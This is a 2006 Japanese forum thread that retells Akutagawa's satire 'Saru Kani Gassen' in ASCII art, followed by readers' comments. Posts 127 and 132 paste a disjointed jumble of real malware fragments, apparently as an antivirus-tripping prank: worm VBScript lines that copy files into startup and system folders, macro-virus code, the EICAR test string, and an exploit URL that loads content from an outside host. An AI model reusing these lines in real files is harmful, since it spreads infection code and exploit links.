┏━┳┓ ̄ ̄ ̄ ̄ ̄| ̄ ̄ ̄|   │  │ ̄ ̄ ̄| ̄i  (´∀` ) ̄ ̄ ̄ ̄ ̄ ̄| ̄ ̄
┃  ┃┗┓        |      |   │  │ ̄ ̄ ̄| ̄~i  ( =|=,~ ),,           |
┗━╋━┛        |      |   │  │ ̄ ̄ ̄| ̄ ̄| (⌒(⌒,,_,)         |
  ┏┻┓_         │,   │   │  │ ̄ ̄ ̄| ̄ ̄ ̄|_(__) ̄ ̄ ̄| ̄| 、 |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧
    (    )(    )(,    )(,,    )    ,,)(    )(    )(,    )

しかも裁判を重ねた結果、主犯蟹は死刑になり、臼、蜂、卵等の共犯は無期徒刑の宣告を受けたのである。
お伽噺のみしか知らない讀者はかう云ふ彼等の運命に、怪訝の念を持つかも知れない。
が、これは事實である。寸毫も疑ひのない事實である。

87 :( ´∀`)さん:2006/10/20(金) 18:50:15 ID:bnzdWTo70
23/40

蟹は蟹自身の言によれば、握り飯と柿と交換した。
が、猿は熟柿を與へず、青柿ばかり與へたのみか、蟹に傷害を加へるやうに、さんざんその柿を投げつけたと云ふ。

しかし蟹は猿との間に、一通の證書も取り換はしてゐない。
よしまたそれは不問に附しても、握り飯と柿と交換したと云ひ、熟柿とは特に斷つてゐない。

     ||   | γニ三ヽ
/ ̄`● .||  と`Cゝ ・、,・)う
/ ̄\\||   |ヽ(# ゚Д゚) ミ
    \ |  | .|  \  ∪
ヽ\   ||.  | |   O-、 )  ミ
●´、\_.|||   |γ,'ニニ∪ヽ
   \ ) )  レ /  `● ~`'●
     || |   /            ミ
     | ||  |
     || |()) |
     ||   |                 ミ
     | |  . |                      ベブッ
     || || . .|                        。 。
     | |   .|                     ミ  ||
     || | | |                     (V●)Д`)(V)
     | |   |                      ミ( 三 )ミ
  ̄ ̄ //   ヽ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

最後に青柿を投げつけられたと云ふのも、猿に惡意があつたかどうか、その邊の證據は不十分である。

88 :( ´∀`)さん:2006/10/20(金) 18:50:47 ID:bnzdWTo70
24/40

だから蟹の辯護に立つた、雄辯の名の高い某辯護士も、
裁判官の同情を乞ふよりほかに、策の出づるところを知らなかつたらしい。
その辯護士は氣の毒さうに、蟹の泡を拭つてやりながら、

     |    。 。
 ̄ ̄ ̄ ̄.|  | |          ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ┌─┬ (V) (l|'Д)(V)  ,,'⌒丶、 (<_`  )< あきらめ給へ
 │  │  ミ(  )ミ_ ゝ@==> (〈y〉と)  \_______
 │  │ ̄ ̄ ̄| ̄i  (´∀` ) ̄ ̄ ̄ ̄ ̄ ̄| ̄ ̄
 │  │ ̄ ̄ ̄| ̄~i  ( =|=,~ ),,           |
 │  │ ̄ ̄ ̄| ̄ ̄| (⌒(⌒,,_,)         |
 │  │ ̄ ̄ ̄| ̄ ̄ ̄|_(__) ̄ ̄ ̄| ̄| 、 |
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄


と云つたさうである。

もつともこの「あきらめ給へ」は、死刑の宣告を下されたことをあきらめ給へと云つたのだか、
辯護士に大金をとられたことをあきらめ給へと云つたのだか、それは誰にも決定出來ない。

89 :( ´∀`)さん:2006/10/20(金) 18:54:55 ID:bnzdWTo70
25/40

 ┌───────────────────────┐
  | (壱)      聞   新   賣   朝           |
  | ─────────────────────── .|
  | | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|                    |
  | |       ,,'⌒丶、  |       ┌‐──── ┐   |
  | |      ゝ@==>.  | | | | |    .| ____. |   |
  | |   。 。 (´∀` )   | | | | |  猿.| /  |   .|   |
  | |  || ( =|=,~ )  | ──  氏. | ´▽ ├   |   |
  | |(V)(゚д゚l|)(V) 人 ヽ     | | | | |  集 | /   |_, |    |
  | | ミ( 三 )ミJ `J    │ | | | |  團 !        |   |
  | └─────────┘ | | | |  暴 ! ┬┬   l .|  |
  | (左) 告 被 蟹 る た 然 愕 ――  行 | ┼┼ | | .|   |
  |  | | | | | | | | | | | | | | | | | | | | | | |  致 | ||   | |    |
  |  | | | | | | | | | | | | | | | | | | | | | | |  致 | /  |   」 |    |

その上新聞雜誌の輿論も、蟹に同情を寄せたものはほとんど一つもなかつたやうである。

蟹の猿を殺したのは私憤の結果にほかならない。
しかもその私憤たるや、己の無智と輕卒とから猿に利益を占められたのを忌々しがつたゞけではないか?
優勝劣敗の世の中にかう云ふ私憤を洩らすとすれば、愚者にあらずんば狂者である。
――と云ふ非難が多かつたらしい。

現に商業會議所會頭某男爵のごときは大體上のやうな意見と共に、
蟹の猿を殺したのも多少は流行の危險思想にかぶれたのであらうと論斷した。
そのせゐか蟹の仇打ち以來、某男爵は壯士のほかにも、ブルドッグを十頭飼つたさうである。

90 :↑は間違ひにて御座ひます:2006/10/20(金) 18:55:33 ID:bnzdWTo70
25/40

 ┌───────────────────────┐
  | (壱)      聞   新   賣   朝           |
  | ─────────────────────── .|
  | | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|                    |
  | |       ,,'⌒丶、  |       ┌‐──── ┐   |
  | |      ゝ@==>.  | | | | |    .| ____. |   |
  | |   。 。 (´∀` )   | | | | |  猿.| /  |   .|   |
  | |  || ( =|=,~ )  | ──  氏. | ´▽ ├   |   |
  | |(V)(゚д゚l|)(V) 人 ヽ     | | | | |  集 | /   |_, |    |
  | | ミ( 三 )ミJ `J    │ | | | |  團 !        |   |
  | └─────────┘ | | | |  暴 ! ┬┬   l .|  |
  | (左) 告 被 蟹 る た 然 愕 ――  行 | ┼┼ | | .|   |
  |  | | | | | | | | | | | | | | | | | | | | | | |  致 | ||   | |    |
  |  | | | | | | | | | | | | | | | | | | | | | | |  死 | /  |   」 |    |

その上新聞雜誌の輿論も、蟹に同情を寄せたものはほとんど一つもなかつたやうである。

蟹の猿を殺したのは私憤の結果にほかならない。
しかもその私憤たるや、己の無智と輕卒とから猿に利益を占められたのを忌々しがつたゞけではないか?
優勝劣敗の世の中にかう云ふ私憤を洩らすとすれば、愚者にあらずんば狂者である。
――と云ふ非難が多かつたらしい。

現に商業會議所會頭某男爵のごときは大體上のやうな意見と共に、
蟹の猿を殺したのも多少は流行の危險思想にかぶれたのであらうと論斷した。
そのせゐか蟹の仇打ち以來、某男爵は壯士のほかにも、ブルドッグを十頭飼つたさうである。


91 :( ´∀`)さん:2006/10/20(金) 18:56:05 ID:bnzdWTo70
26/40

かつまた蟹の仇打ちはいはゆる識者の間にも、一向好評を博さなかつた。
大學教授某博士は倫理學上の見地から、

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 蟹の猿を殺したのは復讐の意志に出たものである。
| 復讐は善と稱し難い。

   ̄ ̄ ̄\| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

      . λ_λ
      (`ー´ ).-,-、
    ・━と<(y)>と)::/:::/
    |:::|/⌒⊂ヽノ|:::|/」
  / ̄ ̄ ̄ ̄ ̄ ̄/|
/______/
| |-----------| |


と云つた。

92 :( ´∀`)さん:2006/10/20(金) 18:56:57 ID:bnzdWTo70
27/40


それから社會主義の某首領は

    ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    (@∀@-)<. 蟹は柿とか握り飯とか云ふ私有財産を難有がつてゐたから、
. _φ_C_) |臼や蜂や卵なども反動的思想を持つてゐたのであらう。
/旦/三/ /|.|事によると尻押しをしたのは國粹會かも知れない。
| ̄ ̄ ̄ ̄ ̄| | \__________________________
|_____|/


と云つた。

93 :( ´∀`)さん:2006/10/20(金) 18:57:52 ID:bnzdWTo70
28/40

それから某宗の管長某師は、

/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| 蟹は佛慈悲を知らなかつたらしい。
| たとい青柿を投げつけられたとしても、佛慈悲を知つていさへすれば、
| 猿の所業を憎む代りに、反つてそれを憐んだであらう。

   ̄ ̄\| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

    | ̄ ̄|
    |__|
   .丿|-Д-)
   γ /イヽ
    .ヽつとノ
   ζ\~⌒\
           |\
/ ̄ ̄ ̄ ̄ ̄ ̄   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| あゝ、思へば一度でも好いから、わたしの説教を聽かせたかつた。
\_____________________________

と云つた。

94 :( ´∀`)さん:2006/10/20(金) 18:58:27 ID:bnzdWTo70
29/40


それから――また各方面にいろ/\批評する名士はあつたが、いづれも蟹の仇打ちには不贊成の聲ばかりだつた。
さう云ふ中にたつた一人、蟹のために氣を吐いたのは、酒豪兼詩人の某代議士である。代議士は

             ∩
     [=]    _, 、_| .|
    / 丶 (# ゚ ∀゚) |
  _ ||  ||γ    ノ
  \ ||  || ゝつ ̄曰 ̄\
  ||\`~~´           \
  ||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
   .  || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
      /|
\_WW/ |WWWWWWWWWWWWWWW/
≫                    ≪
≫ 蟹の仇打ちはぁっ、        ≪
≫                    ≪
≫ 武士道の精神と一致するゥ!!!! ≪
≫                    ≪
/MMMMMMMMMMMMMMMMMM、\

と云つた。

しかしこんな時代遲れの議論は誰の耳にも止るはずはない。
のみならず新聞のゴシツプによると、その代議士は數年以前、動物園を見物中、
猿に尿をかけられたことを遺恨に思つてゐたさうである。

95 :( ´∀`)さん:2006/10/20(金) 18:59:00 ID:bnzdWTo70
30/40



 `` ' ‐- 、 ., _ ,. -‐ '"´`` ' ‐- 、 ., _ ,. -‐ '"´`` ' ‐- 、 ., _ ,. -‐ '"´`` ' ‐- 、 ., _ ,. -‐ '"´`` ' ‐-

       お伽噺しか知らない讀者は、悲しい蟹の運命に同情の涙を落すかも知れない。

                    しかし蟹の死は當然である。

      それを氣の毒に思ひなどするのは、婦女童幼のセンテイメンタリズムに過ぎない。

                     天下は蟹の死を是なりとした。

 ` -‐ '"´`` ' ‐- 、 ., _ ,. -‐ '"´`` ' ‐- 、 ., _ ,. -‐ '"´`` ' ‐- 、 ., _ ,. -‐ '"´`` ' ‐- 、 ., _ ,. -‐ '"´





96 :( ´∀`)さん:2006/10/20(金) 18:59:53 ID:bnzdWTo70
31/40

 (  \ | / イラサーイ           ∧
  )   / ̄\               <⌒>
 ( .―( ゚ ∀ ゚ )―              /⌒\
  )   \_/                ]皿皿[-∧-∧、
 (  /  | \  ________∧_/\_|,,|「|,,,|「|ミ^!、
  )       /三三三三三三三 Π . ∩  |'|「|'''|「|||:ll;|
 (    __| ̄同 ̄同 ̄同 / ̄ ̄∧ ̄ ̄ ̄ ̄∧ ̄\
  )   _/__|==/\===ハ, ̄ ̄|「| ̄ ̄ ̄ ̄|「| ̄ ̄|
 (  /_| ロ ロ 「 ̄ ̄ ̄ ̄ ̄ ̄| | 田 |「|  田 田 |「|[[[[|
  )  |ll.|ロ ロ /|.l⌒l l⌒l l⌒l l´| |    |「|        |「|ミミミミミミ、
 ( /〃 ̄ /::|.| ,,|| ,;:'゙ ゙`ヾ,,.| | 田 |「|  田 田 |「|:::::::::::|
  ) | |  | :|.|,;ヾ゙゙ヾ゙゙゙'';;,,:::ヾ゙゙ヾ''""``ヾ;;,,""~`ヾ゙゙`ヾ、´゙゙ヾ"
 (''""``ヾ;,;ヾ゙゙ヾ
  `〜〜〜〜〜〜 ○ 〜〜〜〜〜〜〜 ○ 〜〜〜〜〜 ○ 〜〜〜〜

        O                O
                                    O
     ゜  zzzz......               ゜
  ⊂⌒/ヽ-、___          ∧_∧              ゜
 ノ⊂/_____/     __ (  ´ _ゝ
  ̄ ̄ ̄ ̄ ̄ ̄ ̄      ( /⌒⌒⌒⌒⌒\             ____
             A_A  \\ *  * * *\            | ∧_∧ Zzzz.....
            (  -w-):.  \\ *   * * \           ./\( ‐∀‐) |
           r'⌒と、j   ヽ   \\_*__*_.)       //\\_У_」つ |
          ノ ,.ィ'  `ヽ. /    `────―─'       //  \\_ ヽ  |
         /       i!./    グガー __∧_∧___  //    //(_) |
          (_,.         //        |__(~д~  ) __|  \\  //    |
        く.,_`^''ー-、_,,..ノ/        |\_〃´ ̄ ̄ ヽ.__\ \\// ̄ ̄ ̄
                            | |\,.-〜´ ̄ ̄ ` ー〜\ \/
                         \|∫\   _,. - 、_,. - 、_ \
                           \  || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
                             \||________|


現に死刑の行はれた夜、判事、檢事、辯護士、看守、死刑執行人、教誨師等は四十八時間熟睡したさうである。
その上皆夢の中に、天國の門を見たさうである。
天國は彼等の話によると、封建時代の城に似たデパアトメント・ストアらしい。

97 :( ´∀`)さん:2006/10/20(金) 19:00:27 ID:bnzdWTo70
32/40


ついでに蟹の死んだ後、蟹の家庭はどうしたか、それも少し書いて置きたい。



蟹の妻は賣笑婦になつた。
なつた動機は貧困のためか、彼女自身の性情のためか、どちらか未だに判然しない。


カニノマンコミテ
     。 。             ∧_∧
    | |             (・∀・ ;)
  (V)(*゚ワ゜)(V)           (   ∧∧___
   ヽ   ノ            | |(゚Д゚;;)__ 丶〜      ヒワイ! エロコハイ!!
   ミ(__(i)_)ミ           (_(_ U U   U U   (・∀・;)
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

98 :( ´∀`)さん:2006/10/20(金) 19:01:00 ID:bnzdWTo70
33/40


蟹の長男は父の沒後、新聞雜誌の用語を使ふと、「飜然と心を改めた。」
今は何でもある株屋の番頭か何かしてゐると云ふ。



            クハセロ!!    。 。
    / ̄ ̄ ̄ ̄\       | |   _._ 。
    /  γ:::::::::ヽ .\   ε= (゚∀゚;;)、'∠ | ┌゚
   /  γ::::::::::::::)   \   ミ(   )ミ`~'(;゚д')(V)
 ̄ ̄             ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

この蟹はある時自分の穴へ、同類の肉を食ふために、怪我をした仲間を引きずりこんだ。
クロポトキンが相互扶助論の中に、蟹も同類を劬ると云ふ實例を引いたのはこの蟹である。

99 :( ´∀`)さん:2006/10/20(金) 19:01:47 ID:bnzdWTo70
34/40

次男の蟹は小説家になつた。





          。 。           ∧ ∧ ナ、ナンデスカ コノヒトハ
          | | 〜♪       (゚ー゚;)
       (V)(*' 3`)(V)         /  |
       三(   )三       〜(,,_/
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
勿論小説家のことだから、女に惚れるほかは何もしない。
たゞ父蟹の一生を例に、善は惡の異名であるなどと、好い加減な皮肉を並べてゐる。

100 :( ´∀`)さん:2006/10/20(金) 19:02:25 ID:bnzdWTo70
35/40

三男の蟹は愚物だつたから、蟹よりほかのものになれなかつた。
それが横這ひに歩いてゐると、握り飯が一つ落ちてゐた。
  |
 . |
 . |
  |                  。 。 そ
| |                  | |
  |               (V)(A` )(V)
  ヽ ̄ ̄ ̄ ̄ ̄ ̄△ ̄ ̄  ミ(   )ミ ...... ̄ ̄ ̄

101 :( ´∀`)さん:2006/10/20(金) 19:02:59 ID:bnzdWTo70
36/40

握り飯は彼の好物だつた。彼は大きい鋏の先にこの獲物を拾ひ上げた。

  ヽ\ |||   |
   \ ) )  |
     || |  |
     | ||  |
     || |()) |
     ||   |
     | |  . |
     || || . .|
     | |   .|               。 。
     || | | |           △  | |
     | |   |            (V)(A`*)(V)
  ̄ ̄ //   ヽ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ミ(   )ミ  ̄ ̄ ̄

102 :( ´∀`)さん:2006/10/20(金) 19:03:32 ID:bnzdWTo70
37/40


すると高い柿の木の梢に蝨を取つてゐた猿が一匹

     ||   | γニ三ヽ
/ ̄`、  ||   |Cゝ ・、,・)う
/ ̄\\||   |  (,,, 。 。)  ボリ/\
    \ |  | .|  \つ と ))
ヽ\   ||.  | |  ⊂⊂ )
 \\_.|||   |γ,'ニニニニヽ
   \ ) )  レ /       ~`
     || |   /
     | ||  |                        ――その先は話す必要はあるまい。
     ||   |
     | |  . |
     || || . .|
     | |   .|               。 。
     || | | |           △  | |
     | |   |            (V)(∀`*)(V)
  ̄ ̄ //   ヽ ̄ ̄ ̄ ̄ ̄ ̄ ̄   ミ(   )ミ  ̄ ̄ ̄

103 :( ´∀`)さん:2006/10/20(金) 19:04:49 ID:bnzdWTo70
38/40

   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   | とにかく猿と戰つたが最後、蟹は必ず天下のために殺されることだけは事實である。
   | 語を天下の讀者に寄す。君たちもたいてい蟹なんですよ。
   \
      ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ∧∧          ∧∧
       (* ゚∀)  ∧∧    (゚A゚*)    ∧∧
      < つl⌒l⌒l(゚*  )━━━━━┳━ (∀゚*)
      ( /つ ┃ (__〜   .(   つ┃  (__,)〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

104 :( ´∀`)さん:2006/10/20(金) 19:05:22 ID:bnzdWTo70
39/40






       ∧∧          ∧∧
       (; ゚∀)  ∧∧    (゚A゚;)    ∧∧
      < つl⌒l⌒l(゚*  )━━━━━┳━ (゚∀゚*)
      ( /つ ┃ (__〜   .(   つ┃  (__,)〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

105 :ノスタルヂヤ ◆eaXD6pa7bM :2006/10/20(金) 19:06:00 ID:bnzdWTo70
40/40

   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   | ネエあなた、話の筋が違ひすぎやしませんか…?
   | 夢もへつたくれも無いぢやありませんか。
   \
      ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
       ∧∧  ??       ∧∧
       (; ゚∀)  ∧∧    (゚A゚;)   ∧∧ ?
      < つl⌒l⌒l(゚*  )━━━━━┳━ (゚∀゚*)
      ( /つ ┃ (__〜   .(   つ┃  (__,)〜
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      /|
/ ̄ ̄ ̄   ̄ ̄ ̄
| ………………
\_______                                       〜 ヲ ハ リ 〜

106 :ノスタルヂヤ ◆djUyVCCSh2 :2006/10/20(金) 19:09:46 ID:bnzdWTo70


  出典 : 芥川龍之介 『猿蟹合戰』  (大正十二年發表)




107 :( ´∀`)さん:2006/10/20(金) 21:34:09 ID:hbo6XWWQ0
GJ!
蟹かわいそす。(つД`)

108 :( ´∀`)さん:2006/10/20(金) 23:41:01 ID:oljdHw2I0
良き仕事で御座います。

109 :( ´∀`)さん:2006/10/21(土) 13:07:06 ID:WlUuljqr0
やはり芥川氏でしたか
未読の作なれど、何やら察しが附きましたw

通之助の暖かひ家庭の様も良き仕事で御座います。

110 :あぼーん:あぼーん
あぼーん

111 :1:2006/10/21(土) 19:11:00 ID:SuMS93Vi0
ノスタルヂヤ殿
乙で御座います。死の物狂ひで新刷れを發足させ、一人孤獨なまゝ
即死囘避に勤しんだ甲斐が有りました。

112 :( ´∀`)さん:2006/10/21(土) 22:08:29 ID:2Mbl9h6W0

          ,ィ
          /:::l   _,,. -──-、
        /:::::::::| /´       \
         /::_::::::::l_/          ヽ
      /'´    {               }
     /      `ー─--、._    l
    /               `ヽ、__.ノ
   l     ●          ●    l
   |                    *  l     その笑顔をマモるため
   l   *     、        "" ,'      ボクは生まれてきた
    、   ""    ヽ-'`ー'     /
     ヽ、_            __/
       /` ー─ -- ‐─ ' ´\



113 :( ´∀`)さん:2006/10/22(日) 19:56:54 ID:3/8OKdh30
>>65-106
ノスタルヂヤ様お久しうございます
貴殿の素晴らしき長編を再び拜見出来る日が來ようとは
嬉しさに天にも昇る心持ちです。
これも>>1様の>>111の御盡力あつてこそ
あらためて深く御禮申し上げます。

114 :( ´∀`)さん:2006/10/24(火) 03:00:52 ID:T1oKEMbQ0
早目の保全也

115 :( ´∀`)さん:2006/10/26(木) 17:01:23 ID:tb2y+Cn50
やはり早めの保全作業

116 :( ´∀`)さん:2006/10/26(木) 19:53:51 ID:UUjw5cTV0
高等學校の必修科目不履修が問題になつてゐますね。
入學試驗のためならば、やむを得なかつたのではと僕は思ひますが…
―――ヽ――――――――――――――────────―――――――――
       莫迦者!學校教育といふものは大學のために出來てゐる物では無いのだぞ。
       樣々な教養を幅廣く身につけることこそが眞の教育なのだからな。
      ――――――y――――――――――――────────────────

        | |            .|
    ∧_∧ |―― ∧∧─―〇|
   ( ´д`) |   (゚Д゚#)    |
__< ! y   >|    ( /つl⌒l⌒l |
 _∧_/~~ ~ノJ   (  ノつ)| ̄ ̄ ̄|
 |_| し| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

117 : ◆1IMMMMMMMM :2006/10/26(木) 23:59:12 ID:77KB7KlB0
  ∧∧
  (,,゚ω゚) むむむ
  く i y u>
  /_/l_|┃
   .U O┃

118 :あぼーん:あぼーん
あぼーん

119 :( ´∀`)さん:2006/10/28(土) 03:51:27 ID:gBgo6vhe0
>>116
いかにも擬古先生らしき正論也

120 :( ´∀`)さん:2006/10/31(火) 20:59:21 ID:5fT6fb8D0
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ∧ ∧   < ホシュ
 ___( °Д°)  \_____________
(_____ノ
 UU  UU


121 :( ´∀`)さん:2006/11/03(金) 20:04:18 ID:+VPq0Xc80
保全計りで申し譯御座いません

122 :( ´∀`)さん:2006/11/07(火) 11:45:34 ID:aP9jjVnJ0
保全

123 :( ´∀`)さん:2006/11/09(木) 12:52:16 ID:3w7gT+sF0
 ∧∧    またあり作品をお待ちしませう
 (*゚ー゚)    時事や季節の一寸した事等も
 < ilYil~/っ  皆で大いに投稿致しませう
 〇i__i ヽ
 ^^UU^^

124 :( ´∀`)さん:2006/11/12(日) 18:17:38 ID:rMt8Ajjf0
保全

125 :( ´∀`)さん:2006/11/14(火) 13:01:03 ID:DLztUfiSO
保守いたします

126 :( ´∀`)さん:2006/11/14(火) 23:24:01 ID:Vo1rgum00
よかつた、よかつた、この刷れも終わつてしまったのだと思って 
其の拾の頃よりがつかりしていたのだが、またこの刷れに逢えるとは!
今日は本統に良い日だ!

127 :( ´∀`)さん:2006/11/16(木) 16:16:04 ID:pC+tEBgU0
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

128 :( ´∀`)さん:2006/11/16(木) 23:58:41 ID:3pt62+1p0 ?2BP(138)
|如何云ふ事であらうか、
\ノヲトントラツプなる物が爲に、刷れが見られぬ!
   ̄V ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      ___
  ∧∧ |  |. _r_ |
  (#゚Д゚)|  |(__C|
 〈 .つ_|_|__|
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

129 :愚民:2006/11/18(土) 20:16:29 ID:Q2T+s6my0
>>127がノヲトントラツプなる物でありますか?


130 :( ´∀`)さん:2006/11/19(日) 12:04:07 ID:5RvT/4HH0
ノヲトン罠にかかつた猫

131 :( ´∀`)さん:2006/11/20(月) 10:58:26 ID:uPQzr6iY0
  ∧_∧
 ( ´Д`)  病原菌罠は社会的にも迷惑千万
 く  y  >   世界的通信網利用者の倫理を向上さすべきですな
  ノノ川川
 (__)_)

132 :( ´∀`)さん:2006/11/20(月) 12:26:22 ID:HtO6YPuH0
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
